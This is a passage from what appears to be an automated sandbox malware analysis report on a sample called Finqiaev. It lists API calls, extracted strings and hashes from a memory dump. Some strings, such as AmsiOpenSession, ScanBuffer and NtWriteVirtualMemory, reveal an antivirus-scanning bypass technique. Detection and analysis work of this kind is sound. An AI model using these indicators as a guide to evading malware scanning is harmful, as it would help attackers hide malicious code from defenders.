                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Select$Object$Palette$ColorStretch$CompatibleCreateDelete$BitmapText$Realize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3080934952-0
                                                                                                                                  • Opcode ID: aa31046cb77343b6b42397443806d67e827ff4a30e75fa4c8501a66ed95c11ae
                                                                                                                                  • Instruction ID: a0e7b4d5b31bfe4b5a8b79300f09235e54a41186470252e5185567ea9cf3414e
                                                                                                                                  • Opcode Fuzzy Hash: aa31046cb77343b6b42397443806d67e827ff4a30e75fa4c8501a66ed95c11ae
                                                                                                                                  • Instruction Fuzzy Hash: 018164B2A00209AFDB51DFA8CD85EEF77FCEB09618F110555BA18F7240D636AD008B65
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetObjectA.GDI32(?,00000054,?), ref: 040D5667
                                                                                                                                  • GetDC.USER32(00000000), ref: 040D5695
                                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 040D56A6
                                                                                                                                  • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 040D56C1
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 040D56DB
                                                                                                                                  • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 040D56FD
                                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 040D570B
                                                                                                                                  • SelectObject.GDI32(?), ref: 040D5753
                                                                                                                                  • SelectPalette.GDI32(?,?,00000000), ref: 040D5766
                                                                                                                                  • RealizePalette.GDI32(?), ref: 040D576F
                                                                                                                                  • SelectPalette.GDI32(?,?,00000000), ref: 040D577B
                                                                                                                                  • RealizePalette.GDI32(?), ref: 040D5784
                                                                                                                                  • SetBkColor.GDI32(?), ref: 040D578E
                                                                                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 040D57B2
                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 040D57BC
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 040D57CF
                                                                                                                                  • DeleteObject.GDI32 ref: 040D57DB
                                                                                                                                  • DeleteDC.GDI32(?), ref: 040D57F1
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 040D580C
                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 040D5828
                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 040D5839
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ObjectSelect$Palette$CreateDelete$ColorCompatibleRealize$BitmapRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 332224125-0
                                                                                                                                  • Opcode ID: 4666a2e10c2ffaf06d3fa02e205f26301c4ecefd4bd884c7cfae98e72c7f1994
                                                                                                                                  • Instruction ID: 9a67c809de21e127711ac92fb2d87a8947930c436515a064431e3b8dd6a99d73
                                                                                                                                  • Opcode Fuzzy Hash: 4666a2e10c2ffaf06d3fa02e205f26301c4ecefd4bd884c7cfae98e72c7f1994
                                                                                                                                  • Instruction Fuzzy Hash: D951CE72E00309BBEB51DBE8CC45FEEB7FCAB08708F144865BA54F7180D675A9448B95
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetDC.USER32(00000000), ref: 040D6642
                                                                                                                                  • CreateCompatibleDC.GDI32(00000001), ref: 040D66A7
                                                                                                                                  • CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 040D66BC
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 040D66C6
                                                                                                                                  • SelectPalette.GDI32(?,?,00000000), ref: 040D66F6
                                                                                                                                  • RealizePalette.GDI32(?), ref: 040D6702
                                                                                                                                  • CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 040D6726
                                                                                                                                  • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,040D677F,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 040D6734
                                                                                                                                  • SelectPalette.GDI32(?,00000000,000000FF), ref: 040D6766
                                                                                                                                  • SelectObject.GDI32(?,?), ref: 040D6773
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 040D6779
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Select$CreateObjectPalette$BitmapCompatible$DeleteErrorLastRealize
                                                                                                                                  • String ID: ($BM
                                                                                                                                  • API String ID: 2831685396-2980357723
                                                                                                                                  • Opcode ID: d17b926086a66f966e306b7d12cc1cf919fde4b7c9f7a567046ca9d4e84bc57e
                                                                                                                                  • Instruction ID: d61839d516a70c02238d87ff53404174486e1f22caf39297642573bd14c18609
                                                                                                                                  • Opcode Fuzzy Hash: d17b926086a66f966e306b7d12cc1cf919fde4b7c9f7a567046ca9d4e84bc57e
                                                                                                                                  • Instruction Fuzzy Hash: 62D12971A002189FDF54EFA8C894BEEBBF5FF48308F048965E904BB255D735A844CB65
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetWindowDC.USER32(00000000), ref: 040F2DBC
                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 040F2DDF
                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 040F2DF1
                                                                                                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 040F2E07
                                                                                                                                  • OffsetRect.USER32(?,?,?), ref: 040F2E1C
                                                                                                                                  • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 040F2E35
                                                                                                                                  • InflateRect.USER32(?,00000000,00000000), ref: 040F2E53
                                                                                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 040F2E6D
                                                                                                                                  • DrawEdge.USER32(?,?,?,00000008), ref: 040F2F6C
                                                                                                                                  • IntersectClipRect.GDI32(?,?,?,?,?), ref: 040F2F85
                                                                                                                                  • OffsetRect.USER32(?,?,?), ref: 040F2FAF
                                                                                                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 040F2FD4
                                                                                                                                  • IntersectRect.USER32(?,?,?), ref: 040F2FE5
                                                                                                                                  • OffsetRect.USER32(?,?,?), ref: 040F2FFA
                                                                                                                                  • FillRect.USER32(?,?,00000000), ref: 040F3016
                                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 040F3035
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Rect$Window$Offset$ClipIntersectPoints$ClientDrawEdgeExcludeFillInflateLongRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2490777911-0
                                                                                                                                  • Opcode ID: d031748ea4fa6820c9afa1d81362acbc1538e3d4e8593b45a19784ddeb85de4f
                                                                                                                                  • Instruction ID: 24079514cd63de2ed36c2d6f122876d2c13573144772227cd341d652459293bc
                                                                                                                                  • Opcode Fuzzy Hash: d031748ea4fa6820c9afa1d81362acbc1538e3d4e8593b45a19784ddeb85de4f
                                                                                                                                  • Instruction Fuzzy Hash: 3FA13871E00208AFDB41DBA8C895EEEB7F9AF49308F1440A5EA54FB251C775BE05DB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 040B296A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message
                                                                                                                                  • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                                  • API String ID: 2030045667-32948583
                                                                                                                                  • Opcode ID: d859c4f5281cbda8b4414c88a6582b1cfc82133eeeed34d51fffe0a0a18cf391
                                                                                                                                  • Instruction ID: d4defe835461ec4e0c75c3e15059365e8196d6fa384901b130b676811fc50b42
                                                                                                                                  • Opcode Fuzzy Hash: d859c4f5281cbda8b4414c88a6582b1cfc82133eeeed34d51fffe0a0a18cf391
                                                                                                                                  • Instruction Fuzzy Hash: 0BA1E630A042548BEF21AB2CC888BD876E5EB49718F1445E9E4C9BB341DB74A9C5CBD9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • IsBadHugeReadPtr.KERNEL32(?,00000004), ref: 04108D04
                                                                                                                                  • GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 04108D1B
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\KernelBase.dll), ref: 04108D21
                                                                                                                                  • IsBadHugeReadPtr.KERNEL32(?,00000004), ref: 04108DAF
                                                                                                                                  • IsBadHugeReadPtr.KERNEL32(?,00000002), ref: 04108DBB
                                                                                                                                  • IsBadHugeReadPtr.KERNEL32(?,00000014), ref: 04108DCF
                                                                                                                                  Strings
                                                                                                                                  • C:\Windows\System32\KernelBase.dll, xrefs: 04108D16
                                                                                                                                  • LoadLibraryExA, xrefs: 04108D11
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HugeRead$AddressHandleModuleProc
                                                                                                                                  • String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
                                                                                                                                  • API String ID: 1004233883-1650066521
                                                                                                                                  • Opcode ID: 8c7274db5e94e5ce0534b8151ab142b5859ad7e2fe75b3b717169f5e8b2413be
                                                                                                                                  • Instruction ID: 5af1c81662f378a37e9a0d87718355570847c68b6c7ff1604c883c6ae592ed5f
                                                                                                                                  • Opcode Fuzzy Hash: 8c7274db5e94e5ce0534b8151ab142b5859ad7e2fe75b3b717169f5e8b2413be
                                                                                                                                  • Instruction Fuzzy Hash: E2316171604305BBEB20EF64CCC1F9A77B8AF1432CF048650EA54AB2C1D7B5F98087A5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 040D3531
                                                                                                                                  • GetDC.USER32(00000000), ref: 040D3574
                                                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 040D35A1
                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 040D35C7
                                                                                                                                  • SelectObject.GDI32(?,?), ref: 040D35E2
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 040D35F1
                                                                                                                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 040D361D
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 040D362B
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 040D3639
                                                                                                                                  • DeleteDC.GDI32(?), ref: 040D364F
                                                                                                                                  • DeleteDC.GDI32(?), ref: 040D3658
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ObjectSelect$CompatibleCreateDelete$BitmapReleaseStretch
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4031419535-0
                                                                                                                                  • Opcode ID: 567bee17c060f1342af7bb54909f646cbc234a3ac7dae409064f4a87b05e5081
                                                                                                                                  • Instruction ID: e0eedcc81f8b8805a0839d4d13c6bc6a0177eb2bf7e2437e8511247fa1341802
                                                                                                                                  • Opcode Fuzzy Hash: 567bee17c060f1342af7bb54909f646cbc234a3ac7dae409064f4a87b05e5081
                                                                                                                                  • Instruction Fuzzy Hash: 1541EF72E00349AFEB51EBE8CC41FEEB7BCEB08704F414811BA04F7240D675A9048BA5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtWriteVirtualMemory,UacScan,041469E4,0410B464,OpenSession,041469E4,0410B464,ScanBuffer,041469E4,0410B464,00000000,0410B44C), ref: 0410AF47
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0410AF4D
                                                                                                                                    • Part of subcall function 040CFD38: GetProcAddress.KERNEL32(0414A358,00000000), ref: 040CFD97
                                                                                                                                    • Part of subcall function 040CFD38: GetCurrentProcess.KERNEL32(0414A35C,Function_00005ADC,00000004,0414A360,00000000,0414A35C,17D783FC,00000040,0414A360,0414A358,00000000,00000000,00000000,00000000,00000000,00000000), ref: 040CFDE3
                                                                                                                                    • Part of subcall function 040CFD38: FreeLibrary.KERNEL32(0414A358,00000000,0414A35C,Function_00005ADC,00000004,0414A360,00000000,0414A35C,17D783FC,00000040,0414A360,0414A358,00000000,00000000,00000000,00000000), ref: 040CFDF4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$CurrentFreeHandleLibraryModuleProcess
                                                                                                                                  • String ID: C:\Windows\System32\ntdll.dll$NtWriteVirtualMemory$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan
                                                                                                                                  • API String ID: 3037636159-4174081549
                                                                                                                                  • Opcode ID: 7ac753a9602d486b42a55862f235c615bffc29ec132caae84f9b9cdf66907aec
                                                                                                                                  • Instruction ID: fc6cc7effa938f4c70b1b149882859b0b2c43222d6e30be9af28126a4cad1dca
                                                                                                                                  • Opcode Fuzzy Hash: 7ac753a9602d486b42a55862f235c615bffc29ec132caae84f9b9cdf66907aec
                                                                                                                                  • Instruction Fuzzy Hash: C0F11E31A001199BEB05EBA4C980FCEB3B9AF4520CF1181A6E145FB356DB74BF458F96
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 040CFD38: GetProcAddress.KERNEL32(0414A358,00000000), ref: 040CFD97
                                                                                                                                    • Part of subcall function 040CFD38: GetCurrentProcess.KERNEL32(0414A35C,Function_00005ADC,00000004,0414A360,00000000,0414A35C,17D783FC,00000040,0414A360,0414A358,00000000,00000000,00000000,00000000,00000000,00000000), ref: 040CFDE3
                                                                                                                                    • Part of subcall function 040CFD38: FreeLibrary.KERNEL32(0414A358,00000000,0414A35C,Function_00005ADC,00000004,0414A360,00000000,0414A35C,17D783FC,00000040,0414A360,0414A358,00000000,00000000,00000000,00000000), ref: 040CFDF4
                                                                                                                                  • CreateProcessAsUserW.ADVAPI32(0423EA3C,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,0423EBB8,0423EBFC,ScanString,041469E4,0410C330,OpenSession,041469E4), ref: 0410C05F
                                                                                                                                  • WaitForSingleObject.KERNEL32(0423EBFC,000000FF,ScanString,041469E4,0410C330,OpenSession,041469E4,0410C330,ScanString,041469E4,0410C330,OpenSession,041469E4,0410C330,UacScan,041469E4), ref: 0410C2AB
                                                                                                                                  • CloseHandle.KERNEL32(0423EBFC,0423EBFC,000000FF,ScanString,041469E4,0410C330,OpenSession,041469E4,0410C330,ScanString,041469E4,0410C330,OpenSession,041469E4,0410C330,UacScan), ref: 0410C2B6
                                                                                                                                  • CloseHandle.KERNEL32(0423EC00,0423EBFC,0423EBFC,000000FF,ScanString,041469E4,0410C330,OpenSession,041469E4,0410C330,ScanString,041469E4,0410C330,OpenSession,041469E4,0410C330), ref: 0410C2C1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandleProcess$AddressCreateCurrentFreeLibraryObjectProcSingleUserWait
                                                                                                                                  • String ID: Amsi$AmsiOpenSession$OpenSession$ScanString$UacScan
                                                                                                                                  • API String ID: 1235825717-661810597
                                                                                                                                  • Opcode ID: d618e744c91a24b7eb7e4da7f3face6330d60493c3aa1c460359bb8d76d948e4
                                                                                                                                  • Instruction ID: 620b2430a45becd48c2d721de5cd04839ed29e0a6ff2330f9204ea7f9b8cef0a
                                                                                                                                  • Opcode Fuzzy Hash: d618e744c91a24b7eb7e4da7f3face6330d60493c3aa1c460359bb8d76d948e4
                                                                                                                                  • Instruction Fuzzy Hash: 13F11D31A101199BEB15EBA4D980FCEB3BAAF4520CF1181A5E084BB355DB70FE458FD9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • RegisterClipboardFormatA.USER32(MSH_WHEELSUPPORT_MSG), ref: 040B746F
                                                                                                                                  • RegisterClipboardFormatA.USER32(MSH_SCROLL_LINES_MSG), ref: 040B747B
                                                                                                                                  • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 040B7493
                                                                                                                                  • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 040B74B7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClipboardFormatMessageRegisterSend
                                                                                                                                  • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                                                                                                                  • API String ID: 1437703442-3736581797
                                                                                                                                  • Opcode ID: 89ea91867a6f2d78a1e34caa83bb144f7a196229fb16148375aee6eba85df289
                                                                                                                                  • Instruction ID: 39b21ac47767f1284e3720600ae9a4f6f8178986e17b3b69c8b549081c0f2826
                                                                                                                                  • Opcode Fuzzy Hash: 89ea91867a6f2d78a1e34caa83bb144f7a196229fb16148375aee6eba85df289
                                                                                                                                  • Instruction Fuzzy Hash: 3211EF71244305AFE7159FA5DC41BE6BBE8EF84715F108465B9C4AF280E7B0B940CBE9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetSystemMenu.USER32(00000000,00000000), ref: 040FF143
                                                                                                                                  • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 040FF161
                                                                                                                                  • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 040FF16E
                                                                                                                                  • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 040FF17B
                                                                                                                                  • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 040FF188
                                                                                                                                  • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 040FF195
                                                                                                                                  • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 040FF1A2
                                                                                                                                  • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 040FF1AF
                                                                                                                                  • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 040FF1CD
                                                                                                                                  • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 040FF1E9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Menu$Delete$EnableItem$System
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3985193851-0
                                                                                                                                  • Opcode ID: 23241799ec2803eb5caea310ee41a3751ad6447c0d39fecbfe55116c129a1b39
                                                                                                                                  • Instruction ID: 71cbd9303053e6467ce6ed928efa852b1098443bb30588d3d5d8fd8e827f60e7
                                                                                                                                  • Opcode Fuzzy Hash: 23241799ec2803eb5caea310ee41a3751ad6447c0d39fecbfe55116c129a1b39
                                                                                                                                  • Instruction Fuzzy Hash: 6621CA70384345BAF760DB24CC8DFDA7AD96B14B1CF0544A0BA887F6D2C6B5BA408759
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Strings
                                                                                                                                  • An unexpected memory leak has occurred. , xrefs: 040B272C
                                                                                                                                  • 7, xrefs: 040B273D
                                                                                                                                  • , xrefs: 040B28B0
                                                                                                                                  • bytes: , xrefs: 040B27F9
                                                                                                                                  • The sizes of unexpected leaked medium and large blocks are: , xrefs: 040B28E5
                                                                                                                                  • Unexpected Memory Leak, xrefs: 040B295C
                                                                                                                                  • The unexpected small block leaks are:, xrefs: 040B27A3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                                  • API String ID: 0-2723507874
                                                                                                                                  • Opcode ID: 65876aded9ab3d1d7885246f1b10ed5dc678bf2c673f58935e639c95266da679
                                                                                                                                  • Instruction ID: 9591cd641433e8e48ffd9381cd7368ef7f6572064d4d3ef3dcd2b2a3563ba22c
                                                                                                                                  • Opcode Fuzzy Hash: 65876aded9ab3d1d7885246f1b10ed5dc678bf2c673f58935e639c95266da679
                                                                                                                                  • Instruction Fuzzy Hash: 3971C730A042588BEF21AB2CC888BD9B6E5EB4D714F1045E9D4CDFB341DB74A9C5CB99
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • MulDiv.KERNEL32(?,?,?), ref: 040EA1AB
                                                                                                                                  • MulDiv.KERNEL32(?,?,?), ref: 040EA1C5
                                                                                                                                  • MulDiv.KERNEL32(?,?,?), ref: 040EA1F3
                                                                                                                                  • MulDiv.KERNEL32(?,?,?), ref: 040EA209
                                                                                                                                  • MulDiv.KERNEL32(?,?,?), ref: 040EA241
                                                                                                                                  • MulDiv.KERNEL32(?,?,?), ref: 040EA259
                                                                                                                                  • MulDiv.KERNEL32(?), ref: 040EA2B0
                                                                                                                                  • MulDiv.KERNEL32(?), ref: 040EA2DA
                                                                                                                                  • MulDiv.KERNEL32(00000000), ref: 040EA300
                                                                                                                                    • Part of subcall function 040D2518: MulDiv.KERNEL32(00000000,?,00000048), ref: 040D2525
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 33267803c358b2f5c816da34f4eb87f16030dfa62666ccbc326171017ba1e9a7
                                                                                                                                  • Instruction ID: a9accd8f77d841c44b69c62e51b77c8afb1b7f624b714ea5bc78c3929b6639b5
                                                                                                                                  • Opcode Fuzzy Hash: 33267803c358b2f5c816da34f4eb87f16030dfa62666ccbc326171017ba1e9a7
                                                                                                                                  • Instruction Fuzzy Hash: EE51FB70708750AFD320DA6AC884BBAB7F9AF89704F044C5DB9D5E7252D63AF854CB21
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • lstrcpyn.KERNEL32(?,?,?), ref: 040B5C7C
                                                                                                                                  • lstrcpyn.KERNEL32(?,?,0000005C,kernel32.dll), ref: 040B5CE0
                                                                                                                                  • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll), ref: 040B5D16
                                                                                                                                  • lstrcpyn.KERNEL32(0000005D,?,00000104), ref: 040B5D7B
                                                                                                                                  • lstrlen.KERNEL32(?,0000005D,?,00000104), ref: 040B5D87
                                                                                                                                  • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104), ref: 040B5DA9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcpyn$lstrlen
                                                                                                                                  • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                  • API String ID: 4046762626-1565342463
                                                                                                                                  • Opcode ID: 96622980ab6cb038da0b8330fe51be4d72fd7d33cb6108d2a7790d82a62c8dbf
                                                                                                                                  • Instruction ID: 3f116db0e5823fbb06df4a91409f151bbd738d39f3a3938bf20a1f09c8dc10cb
                                                                                                                                  • Opcode Fuzzy Hash: 96622980ab6cb038da0b8330fe51be4d72fd7d33cb6108d2a7790d82a62c8dbf
                                                                                                                                  • Instruction Fuzzy Hash: FC417F71E00659BFDB60DFE8CC88ADEB7FDEF48248F0445E5A584F7240D670AA508B98
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetDesktopWindow.USER32 ref: 040EB12B
                                                                                                                                  • GetDCEx.USER32(?,00000000,00000402), ref: 040EB13E
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 040EB161
                                                                                                                                  • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 040EB187
                                                                                                                                  • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 040EB1A9
                                                                                                                                  • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 040EB1C8
                                                                                                                                  • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 040EB1E2
                                                                                                                                  • SelectObject.GDI32(?,?), ref: 040EB1EF
                                                                                                                                  • ReleaseDC.USER32(?,?), ref: 040EB209
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
